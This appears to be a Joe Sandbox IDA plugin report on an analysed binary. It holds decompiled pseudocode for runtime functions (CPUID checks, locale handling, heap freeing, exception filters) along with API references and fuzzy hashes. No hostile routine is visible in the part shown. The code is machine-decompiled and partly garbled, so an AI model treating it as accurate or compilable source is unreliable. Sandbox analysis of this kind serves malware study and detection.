                				_v12 = _t58;
                				if( ~(_v20 ^ 0x49656e69 | _v24 ^ 0x6c65746e | _v28 ^ 0x756e6547) + 1 == 0) {
                					L9:
                					_t63 =  *0xecf1f4; // 0x2
                					L10:
                					if(_v16 < 7) {
                						_t41 = 0;
                					} else {
                						_t74 =  &_v32;
                						_t42 = 7;
                						asm("cpuid");
                						 *_t74 = _t42;
                						_t43 = _t74;
                						_t69 =  *0xece508; // 0x2f
                						 *((intOrPtr*)(_t43 + 4)) = 1;
                						 *((intOrPtr*)(_t43 + 8)) = 0;
                						_t58 = _v12;
                						 *((intOrPtr*)(_t43 + 0xc)) = _t60;
                						_t41 = _v28;
                						if((_t41 & 0x00000200) != 0) {
                							 *0xecf1f4 = _t63 | 0x00000002;
                						}
                					}
                					if((_t58 & 0x00100000) != 0) {
                						_t71 = _t69 | 0x00000004;
                						 *0xecf1f0 = 2;
                						 *0xece508 = _t71;
                						if((_t58 & 0x08000000) != 0 && (_t58 & 0x10000000) != 0) {
                							_t72 = _t71 | 0x00000008;
                							 *0xecf1f0 = 3;
                							 *0xece508 = _t72;
                							if((_t41 & 0x00000020) != 0) {
                								 *0xecf1f0 = 5;
                								 *0xece508 = _t72 | 0x00000020;
                							}
                						}
                					}
                					goto L20;
                				}
                				_t45 = _v32 & 0x0fff3ff0;
                				if(_t45 == 0x106c0 || _t45 == 0x20660 || _t45 == 0x20670 || _t45 == 0x30650 || _t45 == 0x30660 || _t45 == 0x30670) {
                					_t66 =  *0xecf1f4; // 0x2
                					_t63 = _t66 | 0x00000001;
                					 *0xecf1f4 = _t63;
                					goto L10;
                				} else {
                					goto L9;
                				}
                			}


























                APIs
                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00EB00BC
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: FeaturePresentProcessor
                • String ID:
                • API String ID: 2325560087-0
                • Opcode ID: 536be7379916429b6745b6c69862831ffee579e0d71f737760ee900af2a906f4
                • Instruction ID: 6ffc5fcb5abde260615e64b875075d7fa47ae3d8109b21c810f57c147c6319f6
                • Opcode Fuzzy Hash: 536be7379916429b6745b6c69862831ffee579e0d71f737760ee900af2a906f4
                • Instruction Fuzzy Hash: E9415FB1D02216CFE718CF5AD889BABBBE1FB44318F24907AD415F7261D775A845CB80
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetLocaleInfoW.KERNEL32(00000000,?,00000002,?,?,00EB4E67,?,?,?,00000002), ref: 00EBA002
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: InfoLocale
                • String ID:
                • API String ID: 2299586839-0
                • Opcode ID: f3a1f4f019684161ad7636a6ddb7e4b5a1282735b0babfd3a97ebfa73c25a1b1
                • Instruction ID: f92027099c235cad5fda171a4a31d55a22571dc85fc23ec782141a790632aedf
                • Opcode Fuzzy Hash: f3a1f4f019684161ad7636a6ddb7e4b5a1282735b0babfd3a97ebfa73c25a1b1
                • Instruction Fuzzy Hash: DBD05E32004108BFCF019FE1FC09DBE3BA9FB08364F044811FA2CA6121D733A9609B60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00EB1D57(_Unknown_base(*)()* _a4) {
                
                				return SetUnhandledExceptionFilter(_a4);
                			}



                0x00eb1d64

                APIs
                • SetUnhandledExceptionFilter.KERNEL32(?,?,00EB0267,00EB021C), ref: 00EB1D5D
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: 3d16178d0b8265b4f8bda2033346f29d8615322d0464278124cad3f09c46bcd5
                • Instruction ID: 231bcedde2b57cd31494c5ac39b0e1bad85740da11d08c555f9a73bf6c151548
                • Opcode Fuzzy Hash: 3d16178d0b8265b4f8bda2033346f29d8615322d0464278124cad3f09c46bcd5
                • Instruction Fuzzy Hash: 4AA0113000820CABCA002B83EC088883F2CEB002A0B0000A0FC0C000208B23A8A28A80
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E00EA4917(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi) {
                				void* _t60;
                				void* _t65;
                
                				_t65 = __esi;
                				asm("in eax, dx");
                				asm("sbb al, 0x1");
                				 *((intOrPtr*)(__ecx + 0x11234e3)) =  *((intOrPtr*)(__ecx + 0x11234e3)) + __eax;
                				 *((intOrPtr*)(__ecx + 0x16c96f3)) =  *((intOrPtr*)(__ecx + 0x16c96f3)) + __eax;
                				_t6 = _t65 + 0xf8; // 0x55c35d59
                				E00EB2248( *_t6);
                				_t7 = _t65 + 0xfc; // 0x5768ec8b
                				E00EB2248( *_t7);
                				_t8 = _t65 + 0x100; // 0xff000001
                				E00EB2248( *_t8);
                				_t9 = _t65 + 0x104; // 0x43e80875
                				E00EB2248( *_t9);
                				_t10 = _t65 + 0x108; // 0x59000003
                				E00EB2248( *_t10);
                				_t11 = _t65 + 0x10c; // 0x55c35d59
                				E00EB2248( *_t11);
                				_t12 = _t65 + 0x110; // 0x106aec8b
                				E00EB2248( *_t12);
                				_t13 = _t65 + 0x114; // 0xe80875ff
                				E00EB2248( *_t13);
                				_t14 = _t65 + 0x118; // 0x332
                				E00EB2248( *_t14);
                				_t15 = _t65 + 0x11c; // 0xc35d5959
                				E00EB2248( *_t15);
                				_t16 = _t65 + 0x120; // 0x6aec8b55
                				E00EB2248( *_t16);
                				_t17 = _t65 + 0x124; // 0x875ff08
                				E00EB2248( *_t17);
                				_t18 = _t65 + 0x128; // 0x321e8
                				E00EB2248( *_t18);
                				_t19 = _t65 + 0x12c; // 0x5d595900
                				E00EB2248( *_t19);
                				_t20 = _t65 + 0x130; // 0xec8b55c3
                				E00EB2248( *_t20);
                				_t21 = _t65 + 0x134; // 0x75ff016a
                				E00EB2248( *_t21);
                				_t22 = _t65 + 0x138; // 0x310e808
                				E00EB2248( *_t22);
                				_t23 = _t65 + 0x13c; // 0x59590000
                				E00EB2248( *_t23);
                				_t24 = _t65 + 0x140; // 0x8b55c35d
                				E00EB2248( *_t24);
                				_t25 = _t65 + 0x144; // 0x8068ec
                				E00EB2248( *_t25);
                				_t26 = _t65 + 0x148; // 0x75ff0000
                				E00EB2248( *_t26);
                				_t27 = _t65 + 0x14c; // 0x2fce808
                				E00EB2248( *_t27);
                				_t28 = _t65 + 0x150; // 0x59590000
                				E00EB2248( *_t28);
                				_t29 = _t65 + 0x154; // 0x8b55c35d
                				E00EB2248( *_t29);
                				_t30 = _t65 + 0x158; // 0xff006aec
                				E00EB2248( *_t30);
                				_t31 = _t65 + 0x15c; // 0x8ce80875
                				E00EB2248( *_t31);
                				_t32 = _t65 + 0x160; // 0x59fffffe
                				_t60 = E00EB2248( *_t32);
                				return _t60;
                			}






                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 034a6473bbb3b2f040111bce762662fb3b0b83b001bc7e0b41a8a63d6e83d995
                • Instruction ID: c76c982d28fe3763c6dea60a184c129c29c08e1021c71fff5aab45d07e48d500
                • Opcode Fuzzy Hash: 034a6473bbb3b2f040111bce762662fb3b0b83b001bc7e0b41a8a63d6e83d995
                • Instruction Fuzzy Hash: 50211F71860601DBCB523B30DD036D77BE1AF25305F145E6DF3FEB41729A223965A642
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00EB842D(intOrPtr _a4) {
                				intOrPtr _t15;
                				intOrPtr _t54;
                				void* _t56;
                				void* _t57;
                				void* _t58;
                				void* _t59;
                				void* _t60;
                				void* _t61;
                				void* _t62;
                				void* _t63;
                				void* _t64;
                				void* _t65;
                				void* _t66;
                				void* _t67;
                				void* _t68;
                
                				_t54 = _a4;
                				if(_t54 != 0) {
                					_t2 = _t54 + 0xc; // 0xf000000
                					_t56 =  *_t2 -  *0xecee34; // 0xed0054
                					if(_t56 != 0) {
                						E00EB2248(_t16);
                					}
                					_t3 = _t54 + 0x10; // 0x254804b7
                					_t57 =  *_t3 -  *0xecee38; // 0xed0054
                					if(_t57 != 0) {
                						E00EB2248(_t17);
                					}
                					_t4 = _t54 + 0x14; // 0x8000
                					_t58 =  *_t4 -  *0xecee3c; // 0xed0054
                					if(_t58 != 0) {
                						E00EB2248(_t18);
                					}
                					_t5 = _t54 + 0x18; // 0xfc7d80
                					_t59 =  *_t5 -  *0xecee40; // 0xed0054
                					if(_t59 != 0) {
                						E00EB2248(_t19);
                					}
                					_t6 = _t54 + 0x1c; // 0x4d8b0774
                					_t60 =  *_t6 -  *0xecee44; // 0xed0054
                					if(_t60 != 0) {
                						E00EB2248(_t20);
                					}
                					_t7 = _t54 + 0x20; // 0x706183f8
                					_t61 =  *_t7 -  *0xecee48; // 0xed0054
                					if(_t61 != 0) {
                						E00EB2248(_t21);
                					}
                					_t8 = _t54 + 0x24; // 0x5de58bfd
                					_t62 =  *_t8 -  *0xecee4c; // 0xed0054
                					if(_t62 != 0) {
                						E00EB2248(_t22);
                					}
                					_t9 = _t54 + 0x38; // 0x5d595900
                					_t63 =  *_t9 -  *0xecee60; // 0xed0058
                					if(_t63 != 0) {
                						E00EB2248(_t23);
                					}
                					_t10 = _t54 + 0x3c; // 0xec8b55c3
                					_t64 =  *_t10 -  *0xecee64; // 0xed0058
                					if(_t64 != 0) {
                						E00EB2248(_t24);
                					}
                					_t11 = _t54 + 0x40; // 0x10368
                					_t65 =  *_t11 -  *0xecee68; // 0xed0058
                					if(_t65 != 0) {
                						E00EB2248(_t25);
                					}
                					_t12 = _t54 + 0x44; // 0x875ff00
                					_t66 =  *_t12 -  *0xecee6c; // 0xed0058
                					if(_t66 != 0) {
                						E00EB2248(_t26);
                					}
                					_t13 = _t54 + 0x48; // 0x401e8
                					_t67 =  *_t13 -  *0xecee70; // 0xed0058
                					if(_t67 != 0) {
                						E00EB2248(_t27);
                					}
                					_t14 = _t54 + 0x4c; // 0x5d595900
                					_t15 =  *_t14;
                					_t68 = _t15 -  *0xecee74; // 0xed0058
                					if(_t68 != 0) {
                						return E00EB2248(_t15);
                					}
                				}
                				return _t15;
                			}



















                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: f5bf2d46b85f0bab3dd989ce622e6063782c6cadf7c115a5c54b7d68588bb4f1
                • Instruction ID: d86f6136d34f35263c62f8e6885103ebc235d3aae55e4d4c0ecb822de8d8c90d
                • Opcode Fuzzy Hash: f5bf2d46b85f0bab3dd989ce622e6063782c6cadf7c115a5c54b7d68588bb4f1
                • Instruction Fuzzy Hash: 35214B32940204AFC224EB69EA82C9B33EDAF003543A46D18F255F7771CE35FC848A25
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E00EB7973(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				intOrPtr _t12;
                				intOrPtr _t13;
                				intOrPtr _t15;
                				intOrPtr _t22;
                				intOrPtr* _t42;
                
                				if(_a4 > 5 || _a8 == 0) {
                					L4:
                					return 0;
                				} else {
                					_t42 = E00EB2280(8, 1);
                					if(_t42 != 0) {
                						_t12 = E00EB2280(0xb8, 1);
                						 *_t42 = _t12;
                						__eflags = _t12;
                						if(_t12 != 0) {
                							_t13 = E00EB2280(0x220, 1);
                							 *((intOrPtr*)(_t42 + 4)) = _t13;
                							__eflags = _t13;
                							if(_t13 != 0) {
                								E00EB7488( *_t42, 0xece800);
                								_t15 = E00EB7D73(__ebx, __edx, 1, _t42,  *_t42, _a4, _a8);
                								_push( *((intOrPtr*)(_t42 + 4)));
                								__eflags = _t15;
                								if(__eflags == 0) {
                									L14:
                									E00EB2248();
                									E00EB4248( *_t42);
                									E00EB40EE( *_t42);
                									E00EB2248(_t42);
                									_t42 = 0;
                									L16:
                									return _t42;
                								}
                								_push( *((intOrPtr*)( *_t42 + 4)));
                								_t22 = E00EB48E9(__edx, 1, __eflags);
                								__eflags = _t22;
                								if(_t22 == 0) {
                									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
                									goto L16;
                								}
                								_push( *((intOrPtr*)(_t42 + 4)));
                								goto L14;
                							}
                							E00EB2248( *_t42);
                							E00EB2248(_t42);
                							L8:
                							goto L3;
                						}
                						E00EB2248(_t42);
                						goto L8;
                					}
                					L3:
                					 *((intOrPtr*)(E00EAF100())) = 0xc;
                					goto L4;
                				}
                			}












                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                • String ID:
                • API String ID: 1503006713-0
                • Opcode ID: 0022b19fb101386713e5596c7b34828b6358e67d5e0f62417ca998e91ecbffc4
                • Instruction ID: 82d4e0dbc25873a375edb683a063a90e7f3d2b736cacafff5ce311300eef1a2b
                • Opcode Fuzzy Hash: 0022b19fb101386713e5596c7b34828b6358e67d5e0f62417ca998e91ecbffc4
                • Instruction Fuzzy Hash: 7321F63554D601EAEB263F64DC02EDB7BD4DFC1750B21642DF6C4B58B2EA3199009691
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 70%
                			E00EA5135(void* __eax, void* __ebx) {
                				intOrPtr _t5;
                				intOrPtr _t6;
                				intOrPtr _t7;
                				intOrPtr _t8;
                				void* _t13;
                				void* _t23;
                				void* _t24;
                				void* _t26;
                				intOrPtr* _t27;
                				signed int _t28;
                				signed int _t29;
                				intOrPtr _t42;
                
                				_t13 = __ebx;
                				asm("adc eax, 0xec70fc");
                				asm("int3");
                				__imp__DecodePointer( *0xed0110, _t23, _t26);
                				_t27 =  *0xecf20c; // 0x8fe940
                				_t24 = __eax;
                				if(_t27 != 0) {
                					while( *_t27 != 0) {
                						E00EB2248( *_t27);
                						_t27 = _t27 + 4;
                						if(_t27 != 0) {
                							continue;
                						}
                						break;
                					}
                					_t27 =  *0xecf20c; // 0x8fe940
                				}
                				_push(_t13);
                				E00EB2248(_t27);
                				_t28 =  *0xecf208; // 0x0
                				 *0xecf20c = 0;
                				if(_t28 != 0) {
                					while( *_t28 != 0) {
                						E00EB2248( *_t28);
                						_t28 = _t28 + 4;
                						if(_t28 != 0) {
                							continue;
                						}
                						break;
                					}
                					_t28 =  *0xecf208; // 0x0
                				}
                				E00EB2248(_t28);
                				 *0xecf208 = 0;
                				E00EB2248( *0xecf204);
                				_t5 = E00EB2248( *0xecf200);
                				_t29 = _t28 | 0xffffffff;
                				 *0xecf204 = 0;
                				 *0xecf200 = 0;
                				if(_t24 != _t29) {
                					_t42 =  *0xed0110; // 0xa744706c
                					if(_t42 != 0) {
                						_t5 = E00EB2248(_t24);
                					}
                				}
                				__imp__EncodePointer(_t29);
                				 *0xed0110 = _t5;
                				_t6 =  *0xecfd10; // 0x0
                				if(_t6 != 0) {
                					E00EB2248(_t6);
                					 *0xecfd10 = 0;
                				}
                				_t7 =  *0xecfd14; // 0x0
                				if(_t7 != 0) {
                					E00EB2248(_t7);
                					 *0xecfd14 = 0;
                				}
                				_t8 =  *0xececec; // 0x910660
                				asm("lock xadd [eax], esi");
                				if(_t29 == 1) {
                					_t8 =  *0xececec; // 0x910660
                					if(_t8 != 0xeceac8) {
                						_t8 = E00EB2248(_t8);
                						 *0xececec = 0xeceac8;
                					}
                				}
                				return _t8;
                			}
















                APIs
                • DecodePointer.KERNEL32 ref: 00EB091B
                • _free.LIBCMT ref: 00EB0934
                  • Part of subcall function 00EB2248: HeapFree.KERNEL32(00000000,00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB225C
                  • Part of subcall function 00EB2248: GetLastError.KERNEL32(00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB226E
                • _free.LIBCMT ref: 00EB0947
                • _free.LIBCMT ref: 00EB0965
                • _free.LIBCMT ref: 00EB0977
                • _free.LIBCMT ref: 00EB0988
                • _free.LIBCMT ref: 00EB0993
                • _free.LIBCMT ref: 00EB09B7
                • EncodePointer.KERNEL32(00000000), ref: 00EB09BE
                • _free.LIBCMT ref: 00EB09D3
                • _free.LIBCMT ref: 00EB09E9
                • _free.LIBCMT ref: 00EB0A11
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                • String ID:
                • API String ID: 3064303923-0
                • Opcode ID: 5c34df1f3cd55801a7f99261e5b6b2fbb0ab5ab580c82bd8519dd1f20f667e7c
                • Instruction ID: 40097ca679f4d53ba173fe52876249510fa17ec11c5482e72e5d38763d3a9635
                • Opcode Fuzzy Hash: 5c34df1f3cd55801a7f99261e5b6b2fbb0ab5ab580c82bd8519dd1f20f667e7c
                • Instruction Fuzzy Hash: C0218F76D012118FD7259F16BC41E8B77A5FB817203141A3EFA34B3271CB366C468B81
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 80%
                			E00EB7A4A(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
                				signed int _v8;
                				signed int _v32;
                				intOrPtr _v36;
                				signed int _v40;
                				void* _t38;
                				signed int _t43;
                				signed int _t45;
                				signed int _t60;
                				void* _t68;
                				void* _t71;
                				intOrPtr _t77;
                				void* _t79;
                				intOrPtr* _t81;
                				signed int _t82;
                				signed int _t85;
                				intOrPtr _t87;
                				void* _t91;
                
                				_t79 = __edx;
                				_push(__ebx);
                				_push(__esi);
                				_t85 = 0;
                				if(_a12 <= 0) {
                					L5:
                					return _t38;
                				} else {
                					_push(__edi);
                					_t81 =  &_a12;
                					while(1) {
                						_t81 = _t81 + 4;
                						_t38 = E00EB56BB(_a4, _a8,  *_t81);
                						_t91 = _t91 + 0xc;
                						if(_t38 != 0) {
                							break;
                						}
                						_t85 = _t85 + 1;
                						if(_t85 < _a12) {
                							continue;
                						} else {
                							goto L5;
                						}
                						goto L20;
                					}
                					_push(0);
                					_push(0);
                					_push(0);
                					_push(0);
                					_push(0);
                					E00EAEB49(0, _t79);
                					asm("int3");
                					_push(0x14);
                					_push(0xecc560);
                					E00EAF1E0(0, _t81, _t85);
                					_t66 = 0;
                					_v32 = 0;
                					__eflags = _a4 - 5;
                					if(_a4 <= 5) {
                						_t87 = E00EB0595();
                						_v36 = _t87;
                						E00EB42E8(0, _t79, _t81, _t87, __eflags);
                						 *(_t87 + 0x70) =  *(_t87 + 0x70) | 0x00000010;
                						_v8 = _v8 & 0;
                						_t43 = E00EB2280(0xb8, 1);
                						_pop(_t68);
                						_t82 = _t43;
                						_v40 = _t82;
                						__eflags = _t82;
                						if(_t82 != 0) {
                							E00EB20A9(_t68, 0xc);
                							_v8 = 1;
                							E00EB7488(_t82,  *((intOrPtr*)(_t87 + 0x6c)));
                							_pop(_t71);
                							_v8 = _v8 & 0x00000000;
                							E00EB7BBF();
                							_t66 = E00EB7D73(0, _t79, _t82, _t87, _t82, _a4, _a8);
                							_v32 = _t66;
                							__eflags = _t66;
                							if(_t66 == 0) {
                								E00EB4248(_t82);
                								_t43 = E00EB40EE(_t82);
                							} else {
                								__eflags = _a8;
                								if(_a8 != 0) {
                									_t60 = E00EBDB28(_a8, 0xece694);
                									_pop(_t71);
                									__eflags = _t60;
                									if(_t60 != 0) {
                										 *0xed0050 = 1;
                									}
                								}
                								E00EB20A9(_t71, 0xc);
                								_v8 = 2;
                								_t25 = _t87 + 0x6c; // 0x6c
                								E00EB4368(_t25, _t82);
                								E00EB4248(_t82);
                								__eflags =  *(_t87 + 0x70) & 0x00000002;
                								if(( *(_t87 + 0x70) & 0x00000002) == 0) {
                									__eflags =  *0xecee10 & 0x00000001;
                									if(( *0xecee10 & 0x00000001) == 0) {
                										E00EB4368(0xece7fc,  *((intOrPtr*)(_t87 + 0x6c)));
                										_t77 =  *0xece7fc; // 0xece800
                										_t32 = _t77 + 0x84; // 0xecee28
                										 *0xecee20 =  *_t32;
                										_t33 = _t77 + 0x90; // 0xec8760
                										 *0xecee7c =  *_t33;
                										_t34 = _t77 + 0x74; // 0x1
                										 *0xece690 =  *_t34;
                									}
                								}
                								_v8 = _v8 & 0x00000000;
                								_t43 = E00EB7BCE();
                							}
                						}
                						_v8 = 0xfffffffe;
                						E00EB7C01(_t43, _t87);
                						_t45 = _t66;
                					} else {
                						 *((intOrPtr*)(E00EAF100())) = 0x16;
                						E00EAEB1E();
                						_t45 = 0;
                					}
                					return E00EAF225(_t45);
                				}
                				L20:
                			}





















                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson__wsetlocale_nolock
                • String ID:
                • API String ID: 3761839796-0
                • Opcode ID: 0556587309c4ec78ddf18c2651d575d65343c675548cc90777be7f85768d9d39
                • Instruction ID: 97ed45ac5066e8c087459026b5ba92eba88f7f01439dfcbd38624b984c597cf8
                • Opcode Fuzzy Hash: 0556587309c4ec78ddf18c2651d575d65343c675548cc90777be7f85768d9d39
                • Instruction Fuzzy Hash: CD412772508309AFCB10AFA4EC82BDF77E5EF88314F10652DF944BA692DB729541CB51
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 97%
                			E00EA289A(signed int __ebx, signed int __ecx, intOrPtr __edx, signed int __esi) {
                				signed char _t250;
                				void* _t252;
                				signed char _t254;
                				signed int _t257;
                				signed int _t258;
                				signed int _t259;
                				intOrPtr _t260;
                				void* _t261;
                				void* _t262;
                				signed int _t263;
                				signed int _t265;
                				long _t266;
                				intOrPtr _t268;
                				signed char _t272;
                				signed char _t273;
                				signed int _t274;
                				signed int _t275;
                				signed char _t276;
                				signed int _t284;
                				intOrPtr _t285;
                				void* _t287;
                				void* _t288;
                				void* _t289;
                				void* _t290;
                				signed int _t294;
                				void* _t295;
                				signed int _t299;
                				intOrPtr _t301;
                				void* _t303;
                				signed char _t304;
                				long _t305;
                				signed char _t306;
                				signed int _t307;
                				signed int _t309;
                				signed int _t320;
                				char _t321;
                				char _t322;
                				signed int _t324;
                				void* _t325;
                				signed char _t326;
                				signed int _t334;
                				intOrPtr _t335;
                				void* _t337;
                				void* _t338;
                				void* _t339;
                				signed int _t341;
                				long _t342;
                				void* _t343;
                				long _t345;
                				void _t353;
                				void _t356;
                				signed int _t362;
                				signed int _t364;
                				intOrPtr _t365;
                				signed int _t366;
                				void* _t367;
                				intOrPtr _t369;
                				signed int _t370;
                				signed int _t375;
                				long _t376;
                				void* _t377;
                				intOrPtr _t378;
                				char _t381;
                				signed int _t383;
                				void* _t384;
                				intOrPtr _t385;
                				signed int _t387;
                				void* _t390;
                				intOrPtr _t391;
                				intOrPtr _t394;
                				char _t395;
                				intOrPtr _t396;
                				intOrPtr _t397;
                				signed int _t398;
                				void* _t399;
                				void* _t400;
                				void* _t401;
                				signed int _t403;
                				void _t405;
                				void* _t406;
                				void* _t407;
                				signed int _t409;
                				signed short* _t412;
                				signed int _t413;
                				void* _t416;
                				char* _t418;
                				long _t419;
                				signed int _t423;
                				intOrPtr _t424;
                				signed int _t425;
                				signed int _t426;
                				signed int _t427;
                				signed char* _t428;
                				int _t429;
                				signed int _t430;
                				void* _t432;
                				void* _t434;
                
                				_t421 = __esi;
                				_t396 = __edx;
                				_t366 = __ecx;
                				_t362 = __ebx;
                				_t250 =  *((intOrPtr*)(__edx + __ebx + 0x24)) +  *((intOrPtr*)(__edx + __ebx + 0x24)) >> 1;
                				 *(_t432 + 0x13) = _t250;
                				_t252 = _t250 - 1;
                				if(_t252 == 0) {
                					_t254 =  !__esi;
                					__eflags = _t254 & 0x00000001;
                					if((_t254 & 0x00000001) == 0) {
                						goto L2;
                					} else {
                						_t421 = __esi >> 1;
                						__eflags = _t421 - 4;
                						if(_t421 < 4) {
                							_t421 = 4;
                						}
                						_t259 = E00EB22C8(_t366, _t396, _t421);
                						 *(_t432 - 0x10) = _t259;
                						_pop(_t367);
                						__eflags = _t259;
                						if(__eflags != 0) {
                							_t260 = E00EB3F56(_t367, __eflags,  *((intOrPtr*)(_t432 + 8)), 0, 0, 1);
                							_t434 = _t434 + 0x10;
                							_t369 =  *((intOrPtr*)(0xecf230 +  *(_t432 - 0xc) * 4));
                							 *((intOrPtr*)(_t369 + _t362 + 0x28)) = _t260;
                							_t17 = _t432 - 0x10; // 0xeb2b47
                							_t261 =  *_t17;
                							 *((intOrPtr*)(_t369 + _t362 + 0x2c)) = _t396;
                							_t366 =  *(_t432 - 0xc);
                							goto L14;
                						} else {
                							 *((intOrPtr*)(E00EAF100())) = 0xc;
                							_t257 = E00EAF0CC();
                							 *_t257 = 8;
                							goto L161;
                						}
                					}
                				} else {
                					if(_t252 != 1) {
                						L7:
                						_t261 =  *(_t432 + 0xc);
                						 *(_t432 - 0x10) = _t261;
                						L14:
